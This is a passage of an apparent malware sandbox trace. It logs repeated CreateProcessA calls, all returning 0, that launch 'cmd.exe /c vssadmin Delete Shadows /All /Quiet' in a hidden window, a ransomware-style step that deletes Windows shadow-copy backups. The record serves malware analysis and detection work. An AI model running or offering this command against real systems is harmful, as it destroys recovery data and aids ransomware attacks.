dwThreadId=0x0)) returned 0 [0077.379] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.379] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.379] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.379] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.379] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.379] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.379] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.379] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.379] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.379] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.379] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.379] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.380] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.380] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.380] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.380] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.380] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.380] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.380] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.380] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.380] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.380] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.380] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.380] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.380] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.380] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.380] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.380] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.381] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.381] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.381] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.381] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.381] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.381] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.381] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.381] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.381] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.381] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.381] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.381] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.381] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.381] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.381] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.381] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.381] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.382] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.382] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.382] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.382] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.382] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.382] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.382] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.382] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.382] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.382] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.382] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.382] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.382] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, 